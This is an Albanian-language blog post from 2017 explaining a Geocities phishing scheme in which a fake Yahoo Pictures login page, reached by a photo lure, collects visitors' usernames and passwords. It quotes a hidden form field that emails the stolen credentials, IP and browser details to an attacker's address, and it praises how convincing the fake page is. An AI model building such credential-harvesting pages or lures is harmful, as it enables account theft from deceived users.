Saturday, April 15, 2017

1.Geocities Phishing


1.Geocities Phishing
Ky shembull ka te beje me nje metode e cila ben leve mbi deshiren e viktimes per te ditur me shume, apo per te pare me shume mbi dicka qe i intereson. Sic shume nga ju mund ta dine ne Yahoo Geocities perdoruesit mund te ndertojne faqe personale falas. Nje skenar i mundshem eshte ai qe i shtyn vizitoret ne nje faqe personale te klikojne per te hapur me shume foto nga nje vajze fjala vjen. Linku i shtyn ne faqen qe ka saktesisht kodin html qe vijon :

(Shikoni Dokumentin e Bashkelidhur txt)


Pasi vizitoret klikojne mbi kete link i hapet faqja e yahoo pictures LOGIN. Ne momentin qe vizitori per nje cast i tunduar nga deshira per te pare me shume foto, ben login me username dhe fjalekalimin e tij, keto te dhena i dergohen keqberesit automatikisht me email ne adresen e vendosur ne kete pjese te kodit : <INPUT TYPE="hidden" NAME="Mail_To" VALUE="force.intruder@gmail.com">.
Me email (ky email mund te kategorizohet si spam nga disa sherbime email) pervec username dhe password me email do te dergohen edhe te dhena te tjera si IP, lloji i browsertit etj.
Sic mund ta shikonit momenti i renies viktime ishte shume i shpejte dhe pamja e faqes eshte per t'u admiruar. Asgje nuk e dallon nga e verteta.

No comments:

Post a Comment